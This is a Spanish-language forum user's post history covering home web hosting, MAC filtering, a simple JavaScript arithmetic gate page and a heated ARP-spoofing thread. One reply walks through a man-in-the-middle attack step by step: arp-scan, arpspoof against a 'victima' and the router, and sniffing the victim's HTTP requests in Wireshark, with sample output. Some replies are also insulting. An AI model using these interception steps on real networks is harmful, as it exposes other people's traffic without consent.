Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - warcry.

#291
Desarrollo Web / Re: levantar mi primera web
16 Diciembre 2018, 15:07 PM
Cita de: Beginner Web en 16 Diciembre 2018, 01:30 AM
gratis

Esa es la palabra clave, gratis.

si lo quieres gratis, te toca montártelo todo a ti y luego tener un dominio no-ip (aunque este ultimo ya no se si te da 30 días gratis y luego te cobra, estoy bastante obsoleto)

Es relativamente fácil montar un servidor web en casa.

Con respecto a las publicaciones en esa web que montes, tendrás que tener en cuenta la legislación de tu país, sobre el tema del copyright, protección de datos, etc. para no llevarte un susto que creo que es a lo que se refiere @manwan
#292
seguramente tengas un filtrado de mac, precisamente para evitar a los vecinos gorrones que usan dispositivos de largo alcance por que quieren tener internet gratis
#293
Hacking Wireless / Re: Arp spoof acaba en DoS
14 Diciembre 2018, 13:42 PM
Cita de: therodri2 en 14 Diciembre 2018, 01:53 AM
Sí te entiendo perfectamente, y en efecto hago lo mismo que tú. El problema es que se cae el router, antes de ni si quiera poder abrir Wireshark.

Disculpa si te ha caído mal mi pregunta. Más bien iba dirigido a si esto es provocado por algún sistema de seguridad que tengan los routers más modernos o si es que definitivamente hay algo raro.

Y gracias!

¿que marca y que modelo es? si lo sabes es probable que en sus especificaciones te diga si tiene alguna contramedida contra ataques de MITM

lo que no me cuadra es esto

Cita de: therodri2 en 12 Diciembre 2018, 01:16 AM

Abro Wireshark y lo que veo es que no hay ningún ARP falso, todas las respuestas llevan la mac verdadera del dispositivo real y no la que estoy usando para engañar al router y al target.


si no ves ningún paquete arp simulado en wireshark es que tu distribucion linux no esta haciendo bien su trabajo, bien porque tenga algún problema de drivers, paquetes, librerias o porque estes usando una maquina virtual y no este bien configurada, etc.
#294
Hacking Wireless / Re: Arp spoof acaba en DoS
13 Diciembre 2018, 20:55 PM
lo que solicitas es muuuu básico, por tanto nos haces perder el tiempo, ahora tengo 5 min libres y era o contestarte a ti, o al que quiere "hacer un sistema operativo", como en este caso al colega del sistema operativo solo puedo decirle que lo que intenta hacer es un juego de niños, ya que compilar un kernel no tiene merito ninguno, ya que lo que realmente es un merito es currarse tu propio kernel, entonces es probable que se lo tome a mal, asi que te contesto a ti

wifiway ~ # arp-scan 192.168.0.0/24
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.2 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.0.1     XX:XX:XX:XX:XX:XX       (router)
192.168.0.10    XX:XX:XX:XX:XX:XX        (victima)
192.168.0.11   XX:XX:XX:XX:XX:XX        VMware, Inc.
192.168.0.12   XX:XX:XX:XX:XX:XX        VMware, Inc
192.168.0.13   XX:XX:XX:XX:XX:XX        VMware, Inc
192.168.0.14   XX:XX:XX:XX:XX:XX         VMware, Inc.

con esto haces un escaneo rapido de la red, suponiendo que sepas lo que es una ip y lo que es una mascara de red, etc, etc, etc.

ahora seleccionas una victima y envenenas la red (te haces pasar por el router)
wifiway ~ # arpspoof -i eth0 -t 192.168.0.10 192.168.0.1
<aqui ves tu mac><aqui macvictima>0806 42: arp reply 192.168.0.1 is-at <aqui tu mac>
xx:xx:xx:xx:xx:xx aa:aa:aa:aa:aa:aa 0806 42: arp reply 192.168.0.1 is-at xx:xx:xx:xx:xx:xx
xx:xx:xx:xx:xx:xx aa:aa:aa:aa:aa:aa 0806 42: arp reply 192.168.0.1 is-at xx:xx:xx:xx:xx:xx
xx:xx:xx:xx:xx:xx aa:aa:aa:aa:aa:aa 0806 42: arp reply 192.168.0.1 is-at xx:xx:xx:xx:xx:xx
xx:xx:xx:xx:xx:xx aa:aa:aa:aa:aa:aa 0806 42: arp reply 192.168.0.1 is-at xx:xx:xx:xx:xx:xx

y asi sucesivamente

Y ahora la vuelta

wifiway ~ # arpspoof -i eth0 -t 192.168.0.1 192.168.0.10
<aqui ves tu mac><aqui macrouter>0806 42: arp reply 192.168.0.10 is-at <aqui tu mac>
xx:xx:xx:xx:xx:xx aa:aa:aa:aa:aa:aa 0806 42: arp reply 192.168.0.10 is-at xx:xx:xx:xx:xx:xx
xx:xx:xx:xx:xx:xx aa:aa:aa:aa:aa:aa 0806 42: arp reply 192.168.0.10 is-at xx:xx:xx:xx:xx:xx
xx:xx:xx:xx:xx:xx aa:aa:aa:aa:aa:aa 0806 42: arp reply 192.168.0.10 is-at xx:xx:xx:xx:xx:xx
xx:xx:xx:xx:xx:xx aa:aa:aa:aa:aa:aa 0806 42: arp reply 192.168.0.10 is-at xx:xx:xx:xx:xx:xx

y asi sucesivamente

ahora abres el sniffer de red que te de la gana, por ejemplo wireshark y lo pones a escuchar en la interface en mi caso la eth0

te vas al navegador de la victima lo abres y tecleas marca.es, y te vas al wireshark, pones un filtro y podras ver

CitarGET / HTTP/1.1

Host: marca.es

Connection: keep-alive

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: es-ES,es;q=0.9



HTTP/1.1 301 Moved Permanently

Server: nginx/1.2.7

Date: Thu, 13 Dec 2018 19:26:56 GMT

Content-Type: text/html

Content-Length: 184

Connection: keep-alive

Location: http://www.marca.com/



<html>

<head><title>301 Moved Permanently</title></head>

<body bgcolor="white">

<center><h1>301 Moved Permanently</h1></center>

<hr><center>nginx/1.2.7</center>

</body>

</html>


tan sencillo como eso :silbar:
#295
Cita de: buite en  3 Diciembre 2018, 09:46 AM
Normal que crezca. Es lo que viene instalado en los ordenadores.

hay pc que vienen con chrome OS, lo que pasa es que no los compra ni dios, o con linux, estos ultimos tienen algo mas de suerte, pero si lo que quieres es instalar un linux los compras sin sistema operativo y te instalas lo que quieras, mejor que tragarte un ubuntu.

echale un ojo a pccomponentes y veras que oferta hay, pero ¿quien coño quiere una ***** de sistema opertivo teniendo windows?
#296
Cita de: Machacador en 23 Noviembre 2018, 22:37 PM
Mira los temas fijos en este foro: https://foro.elhacker.net/hacking_wireless-b48.0/

:rolleyes: :o :rolleyes:

Saludos.
Estás fumado?

Que tiene que ver lo que pregunta el user con los temas fijos?

Si no tienes ni pajolera idea de que responder no contestes y punto, o estas haciendo méritos para moderador?

Si es así te has cubierto de gloria, demostrando tu ignorancia.

Volviendo al hilo, todo lo que utiliza RF es detectable, otra cosa es que sea descifrable.

Puedes utilizar los dispositivos wifi para hacer un point to point modificando los paquetes con scapy y creando un "protocolo" no estandarizado que solo entienden tus dispositivos.

Busca una demo que hizo Yago hansen
#297
veo que estas muy pez, y asi no hay quien te pueda ayudar.

si un simple código html se te hace un mundo  :silbar:

a ver si soy capaz de explicarte el concepto.

tu tienes un index en el cual tienes un enlace a una pagina que se llama contacto.html, entiendo por tus comentarios que en esa pagina contacto.html tienes el captcha.

pues coges todo el código que te he puesto y lo pegas en un txt, le llamas transicion y le cambias la extensión de txt a html quedándote transicion.html y ese archivo html lo metes en la carpeta de tu servidor donde tienes el archivo contactos.html

en tu index cambias la ruta de tu enlace a contacto, para que apunte a transicion.html en vez de a contacto.html y en el código que te he dado donde pone https://google.es

Citar<form style="text-align:center" name="f1" method="get" action="https://google.es">

y pones

Citar<form style="text-align:center" name="f1" method="get" action="/contacto.html">

asi cuando algun bot siga el enlace de contacto, tiene que introducir la respuesta correcta antes de continuar.

cuando alguien introduce 25 y le da con el ratón a aceptar (el enter esta intencionadamente desactivado) es cuando esa pagina de transición le deriva a contacto.html para que rellene el formulario y el captcha.

no se si me he explicado, pero dado tu estado actual lo mas probable es que te suene a chino lo que te he puesto

por cierto esta web de transición no vale de nada, si tienes por ahi links externos que apuntan directamente a contacto ya que un boot que siga enlaces de los comentarios del youtube nunca va a ir a la web de transición, a no ser que a la web de transicion la llames contacto.html y a la que antes se llamaba contacto.html la llames por ejemplo contacto1.html
#298
un ejemplo rapido con javascript

si tecleas 25 te manda a google, si no te sale un aviso de que el resultado no es correcto y no te deja continuar

<html>
<head>
<meta charset="UTF-8">
<script>
function comprobarClave(){
   
    clave = document.f1.clave.value


if (25 != clave) {
alert ("El resultado no es correcto");
return false;
}

if (25 == clave) {
return true;
}

}
</script>
</head>
<body>
<p style="text-align:center">Introduzca el resultado de la operacion para continuar</p>
</p>
<form style="text-align:center" name="f1" method="get" action="https://google.es">
<label><h5>cuanto es 5 x 5</h5></label>
<label><h5>RESULTADO</h5></label>
<input name="clave" type="text" size=20 />
<br><br/>
<input type="button" value="Aceptar" style="FONT-SIZE:16pt;" onclick=" if ( comprobarClave() == true ) document.f1.submit(); "/>
</form>
</body>
</html>
#299
es fácil de hacer lo que pides.

el problema es que las redes que te interesa atacar no son tuyas, por eso tienes que estar todo el dia esperando
#300
Redes / Re: Como Funciona el protocolo NAT
18 Noviembre 2018, 14:17 PM
llevas tres post pidiendo que te expliquen cosas que con una simple búsqueda en google tienes información a mogollón

ERES UN TROLL